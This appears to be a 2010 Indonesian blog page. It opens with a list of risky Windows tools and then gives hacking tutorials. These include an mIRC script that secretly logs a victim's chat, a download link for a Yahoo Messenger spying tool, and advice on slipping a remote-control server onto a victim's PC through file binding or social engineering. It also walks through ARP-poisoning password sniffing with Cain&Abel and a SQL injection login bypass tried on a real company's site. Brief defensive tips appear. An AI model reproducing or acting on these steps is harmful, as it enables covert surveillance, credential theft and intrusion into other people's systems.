My title

Rabu, 10 Maret 2010

Tool Berbahaya Bagi Windows

Sering kali kita tergiur begitu melihat fitur yang ditawarkan oleh sebuah software, tanpa memperhatikan kualitas dari software itu sendiri. Padahal bukan tidak mungkin software yang kita download (baik itu free ataupun yang berbayar) merupakan sebuah software di program dengan buruk (Parameter buruk tidak nya pemrograman sebuah tool, menurut para analis software dapat dilihat dari seberapa besar kesalahan pemrogramannya pada 1000 baris kode pertama, dan batas kewajaran untuk sebuah software adalah dua baris sedangkan pada software server tidak boleh melebihi dari setengah baris) dan dikategorikan sebagai software yang berbahaya. Dikategorikan berbahaya karena dapat memperlambat kinerja pc atau lebih parah lagi dapat merusak windows.

Salah satu contoh dari software yang dikategorikan berbahaya adalah Smart PC Profesional.

Tools ini memiliki fungsi merapikan registry, tetapi ia tidak membackup file registry terlebih dahulu, akibatnya bila terjadi kesalahan, sistem akan rusak selamanya. Selain itu, tools ini ingin menghapus nilai-nilai untuk fonts yang terintegrasi dalam sistem. Hal yang sama terjadi jika tools ini berhadapan dengan file .DLL program yang aktif dan folder backup Service Pack. Tools ini juga menggolongkan file backup "boot.bak" dan "bootsec.bak" sebagai file junk. Padahal file-file tersebut mengamankan boot windows bila file-file asli dengan ekstensi .INI rusak. Melalui fungsi "Windows Boots", tool ini juga mengacaukan kinerja RAM.

Tools lain yang dikategorikan sebagai tools berbahaya adalah:
1. SpyEraser: tools ini menghapus registry key yang dianggap sebagai spyware.
2. GpartEd: dapat merusak sistem pada vista.
3. Nimo Codec Pack: Tidak memiliki pengaturan filter sehingga dapat menurunkan kualitas secara drastis

Sebenarnya, masih ada beberapa tools yang dikategorikan sebagai tools berbahaya. Berikut ini tool ternama yang memiliki celah keamanan terbanyak pada tahun 2007.
1. Yahoo Messenger 8.2.0.239
2.Apple QuickTime 7.2
3. Mozilla Firefox 2.0.0.6
4. Windows Messenger 7.0 & 8.0
5. Mware Player 2.0 & 1.0.4
6. Apple iTunes 7.3.2
7. Intuit QuickBooks Online Edition 9
8. Java Runtime 1.0.6_X
9. Yahoo Widgets 4.0.5
10. Ask.com Toolbar 4.0.2.53

Tulisan ini diambil dari majalah Chip edisi tahun 08

TOOLS

Bermain-main dengan Yahoo Messenger

Seorang hacker biasanya cenderung memilih client yang ada di channel IRC sebagai korbannya, hal ini karena IRC lebih tidak teratur dan biasanya tidak dimoderasi. Keadaan ini akan lebih memudahkan hacker untuk menyerang korbannya.

Seorang hacker bisa memonitor apa yang ditulis oleh korbannya dan dengan siapa saja dia melakukan komunikasi di IRC. Untuk melakukan hal itu, hacker hanya perlu menyusupkan script ke system korban.

on 1:INPUT:*:{msg [#nama channel] $active $+ : $1- write c:\windoes\system\[nama file] <$+ $nick $+ $ip $+> $active $+ : 1-}

Fungsi script diatas adalah untuk mengirimkan pesan ke channel yang sudah ditentukan. Script ini pernah hits di awal tahun 2003an.

Namun sekarang IRC sudah banyak ditinggalkan orang dan lebih memilih Instan messeging seperti Yahoo messenger dan sejenisnya yang dianggap lebih langsung, friendsly dan aman. Hal itu ditunjukkan oleh Yahoo Messenger yang apabila akan masuk ke salah satu channel, kita harus melalui sebuah filter berupa captcha.
Namun demikian, YM sebenarnya masih tetap bisa dimonitor walaupun untuk melakukan hal ini, kita membutuhkan tool dari pihak ketiga. Saya Sendiri biasa menggunakan YahooChecker.

Untuk mendapatkan tool nya, silahkan sedot di:
http://rapidshare.com/files/109330688/yahoochecker.exe

Kita asumsikan anda telah mendownload dan menginstal yahoockecker.exe. kemudian jalankan programnya. Screenshoot nya seperti gambar di bawah ini.

Setelah itu kita lakukan konfigurasi.

1. Tentukan Adapter

2. Scanning terhadap ip address jaringan lokal

Pilih salah satu IP yang akan kita monitor

3. Klik START untuk memulai monitoring

Jika room yang kita monitor ternyata sedang online dan melakukan komunikasi di YM, hasilnya akan tampak seperti gambar dibawah ini.

Ingat,,,ngintip merupakan pekerjaan yang kurang baik...bisa berakibat timbilan..!!

Mengontrol PC Orang Lain

Apa yang akan kita bicarakan kali ini sebenarnya sudah menjadi hal yang umum bagi admin jaringan, tapi yang namanya belajar tentunya tidak mengenal hal itu. Yang akan kita bahas ialah bagaimana mengontrol komputer lain secara remote. Disini kita menggunakan COOL! Remote Control, alasan saya memilihnya karena COOL! sangat mudah dioperasikan. Selain itu, bagi para peternak keylogger mungkin ini bisa menjadi salah satu alternatif mengingat memasyarakatnya pengguna freezer yang membuat keylogger tidak bisa berbuat banyak.

Tool nya silahkan sedot di http://rapidshare.com/files/107271807/remote.zip

Download dan install lah! Kemudian buka direktori C:\Program Files\COOL! Remote Control, disana ada dua buah file aplikasi yaitu RemoteControl dan Remote Server.

File pertama yaitu RemoteControl merupakan aplikasi controler untuk komputer kita sedangkan file yang kedua adalah file connector antara komputer kita dengan korban. File inilah yang harus dikirim kemudian di jalankan di komputer korban. Silahkan anda pikirkan bagaimana caranya agar file RemoteServer ini bisa dijalankan, apakah mau di bungkus oleh file lain (digabungkan) kemudian dikirim ke korban atau gunakan social engineering...teu langkung!

Jalankan program Cool! Screenshootnya seperti ini.

Hal pertama yang harus kita lakukan ialah menghubungkan antara komputer kita dengan komputer korban. Kita asumsikan bahwa kita telah menyimpan dan menjalankan file server di komputer korban. Untuk itu, klik menu Main-Connect To atau gunakan Ctrl+C

Isi Ip Address dari komputer korban kemudian klik OK.

Setelah koneksi berhasil, Anda bisa berbuat banyak pada komputer korban termasuk menjawab pesan di chatting.

Namun ada satu kelemahan dari cool ini yaitu pada saat file server di jalankan dia akan menambahkan satu icon. Perhatikan gambar berikut!

Tapi diluar itu, tool ini layak untuk dijadikan salah satu senjata.

Sniffing dengan Cain&Abel

Sebelum kita membahas tentang bagaimana cara melakukan aksi sniffing dalam sebuah jaringan LAN, ada baiknya kita mengetahui apa yang dimaksud dengan sniffing.
Sniffing adalah sebuah aksi penyadapan. Melihat cara yang digunakan, sniffing dibagi kedalan dua kategori; passive sniffing yaitu melakukan penyadapan tanpa merubah data atau packet apapun dari jaringan sedangkan active sniffing merubah packet di jaringan atau mengirimkan packet dengan alamat MAC yang berubah-ubah secara acak dalam jumlah yang sangat banyak. Active sniffing biasanya menggunakan tool tambahan (yang biasa digunakan yaitu Etherflood), tapi kali ini kita hanya akan membahas bagaimana cara menggunakan passive sniffing dan tool yang kita gunakan adalah Cain&Abel.
Cain&Abel merupakan sebuah tool yang sangat popular dan cara penggunaannyapun sangat sederhana, untuk sedot Cain&Abel bisa diambil pada topik TOOLS.
Langkah-langkah yang harus dilakukan:
1. Install program Cain&Abel
2. Jalankan Cain
3. Untuk melakukan aksi sniffing, klik sub-tab Sniffer
4. Klik sub-tab APR
5. Klik menu Configure – akan muncul configure dialog yang berisi tentang beberapa sub-tab configuration – klik tab Sniffer – akan tampak beberapa keterangan tentang Adapter, IP Address dll – klik satu baris di bawah menu-menu tadi yang berisi keterangan IP Address komputer kita, MAC dll – kemudian OK.
6. Active kan Cain dengan mengklik tombol Start
7. Agar komputer kita memiliki kemampuan routing, klik tombol Start APR
8. Jalankan Command Prompt
9. Lakukan komunikasi dengan komputer target dengan melakukan pinging terhadap IP Address komputer target, contoh c:\ping 192.168.0.2, dalam beberapa kasus kita harus melakukan pinging (menurut pengalaman saya, pinging merupakan cara tercepat untuk melakukan komunikasi dengan komputer target) lebih dari satu komputer, hal itu bertujuan untuk menjadikan komputer lain sebagai gateway.
10. Pada Cain ada dua bagian tabel yang bermenu sama Status, IP Address, MAC Address dll. Untuk memulai, klik tabel bagian atas (router area), kemudian klik tanda plus (Add to list)
11. Akan muncul dialog New ARP Poison Routing. Klik IP Address komputer target yang ada di kolom sebelah kiri dan klik IP Address komputer gateway pada kolom sebelah kanan. Klik OK
Setelah IP Address masuk ke dalam list, kita tinggal menunggu lalu lintas packet yang tertangkap oleh Cain. Untuk mengetahui hasil yang tertangkap, klik tab passwords.

- Cara kerja dari Cain:
Cain&Abel meracuni ARP tabel komputer target sehingga komunikasi antara komputer target dengan gateway harus melalui komputer kita.

- Masalah yang sering ditemukan:
Cain&Abel sering teridentifikasi sebagai virus oleh antivirus, hal ini dikarenakan antivirus menggunakan fasilitas heuristic yaitu menebak-nebak sebuah file sebagai virus, fungsi ini bertujuan untuk mengenali virus-virus baru yang belum terdeteksi oleh database antivirus. Namun fasilitas ini terkadang menjadi “false warning” dan menganggap program-program tertentu terutama hack tools sebagai virus, bahkan antivirus lain pun dianggap virus.

- Bagaimana mencegah aksi snifing ini:
Untuk mencegah aksi ini, lakukan perubahan pada ARP, dalam hal ini type dari ARP yang akan kita ganti dari dynamic menjadi static. Caranya : c:\arp –s [IP Address] [MAC Address] dan untuk mengembalikan ke keadaan semula, ganti atribut –s menjadi -d

Thanks to :
S'to Jasakom
hyp3rl1nk

Ngisengin Orang

Kenapa Saya memberi judul pada tulisan kali ini”Ngisengin Orang”? Karena kali pertama saya menggunakan ini hanya untuk iseng pada sebuah room di sebuah warnet.

Kali ini saya ingin menyentuh tentang sebuah bahasa pemrograman yaitu VBS untuk mengirimkan pesan pada komputer lain yang berada dalam satu jaringan. Pada prinsipnya disini menggunakan Net Send, bedanya ada sedikit modifikasi dengan menggunakan VBScript.

Berikut adalah script nya:

Option Explicit

Const MyApp = "Send Network Message, By: BlackSignal"

Const Netsend = "%COMSPEC% /C %SystemRoot%\system32\NET.EXE SEND"

Const WindowStyle = 0

Const WaitOnReturn = False

Dim sCommand, sSendto, sMessage

Dim oSh

On Error Resume Next

If Not IsWinnt() Then

Wscript.Echo "Script ini hanya berlaku untuk windows berbasis NT"

Wscript.Quit(1)

End If

sSendto = InputBox("Masukkan nama komputer target atau IP Address atau gunakan karakter * untuk pengiriman massal", MyApp)

If sSendto = "" Then Wscript.Quit(1)

sCommand = Netsend & " " & sSendto

sMessage = InputBox("Ketikkan pesan Anda:", MyApp)

If sMessage = "" Then Wscript.Quit(1)

sCommand = sCommand & " " & sMessage

Set oSh = CreateObject("Wscript.Shell")

oSh.Run sCommand, WindowStyle, WaitOnReturn

Set oSh = Nothing

Private Function IsWinnt()

Const OSNT = "Windows_NT"

Dim oSh

Dim sOS

IsWinnt = False

Set oSh=CreateObject("Wscript.Shell")

sOS = oSh.ExpandEnvironmentStrings("%OS%")

Set oSh = Nothing

If sOS = OSNT Then IsWinnt = True

End Function

Script tersebut disimpan dalam ekstensi .vbs
Cara kerja dari script ini adalah mengirimkan pesan ke komputer target dengan memasukkan alamat IP Address target atau dengan memasukkan karakter * untuk pengiriman massal.

Tampilannya seperti gambar dibawah ini.

Thanks to:

Okki Navarone

Efvy Zamidra Zam

Lirva32

SQL Injection

Kali ini kita akan membicarakan sedikit tentang SQL Injection, disini kita akan membahas tentang kemungkinan celah untuk melakukan penyerangan melalui SQL Injection. Berbeda dengan penyerangan XSS yang berdampak pada pengunjung sebuah situs, penyerangan SQL Injection langsung menyerang pada situs itu sendiri dan tentu saja yang menjadi sasaran adalah database nya.
Saya akan mengambil contoh situs BUMN yang cukup besar. Walaupn data yang kita peroleh dari contoh berikut bukan sesuatu yang teramat penting, tapi dari sini kita bisa melihat bahwa para administrator masih banyak yang lalai terhadap sisi keamanan dan kredibilitas baik admin ataupun perusahaan menjadi taruhannya.

Pada form login kita masukkan ' or ' dan hal serupa kita masukkan pada field password

hasilnya akan tampak seperti berikut

atau kita ambil contoh kode lainnya

' or ' ='

mengapa bisa demikian?
Pada form login, pada umumnya statment nya sebagai berikut:

SELECT * FROM tabel WHERE field_username = input _username AND field_password = input_password

begitu kita mengekseskusi ' or ' =' maka perintahnya akan menjadi

SELECT * FROM tabel WHERE field_username "or"='' AND field_password = ''OR'' = ''

Logika OR menyebab kan perintah SQL selalu mengembalikan nilai true sehingga sistem akan mengizinkan anda masuk ke wilayah yang seharusnya dimasuki oleh member atau admin.

Untuk bahan percobaan, silahkan gunakan sebuah sistem yang memang dibuat dengan celah keamanan dari sisi SQL Injection sangat terbuka. Anda bisa sedot dari www.foundstone.com/us/resourse-free-tools.asp dengan nama file hacmebank atau hacmebank2_source.zip

Hal yang perlu anda persiapkan untuk menjalankan sistem tersebut adalah:
1. Microsoft.NET Framework v1.1
2. Microsoft IIS
3. MSDE 2000Release A

Sebenarnya, banyak hal yang bisa dilakukan untuk aksi penyerangan melalui SQL Injection, namun disini saya hanya ingin membahas tentang apa itu SQL Injection seperti apa alur logika nya dan cara yang saya gunakan di atas adalah cara yang biasa dilakukan untuk penetrasi awal. Jadi untuk hal-hal yang lebih lanjut anda bisa googling untuk mendapatkan cara ataupun cheat code nya.

Lantas apa yang bisa dilakukan untuk mencegah hal tersebut?
1. kesadaran individu terhadap keamanan akan sistem yang dikelolanya dalam hal ini sang admin. Umumnya username menggunakan id "admin", cobalah ganti dengan 4Dm1n atau sebagainya, hal ini dimaksudkan agar tidak mudah ditebak
2. lakukan penyaringan pada field, batasi jumlah karakter hanya pada a-z, A-Z, 1-0, ("_","@","." bila anda menggunakan id dengan email), tolak karakter khusus seperti *, &, ' dsb.
3. Anda bisa menggunakan tools dari pihak ketiga untuk menguji sistem yang anda buat.
4. perhatikan script dan syntax nya.
5. dll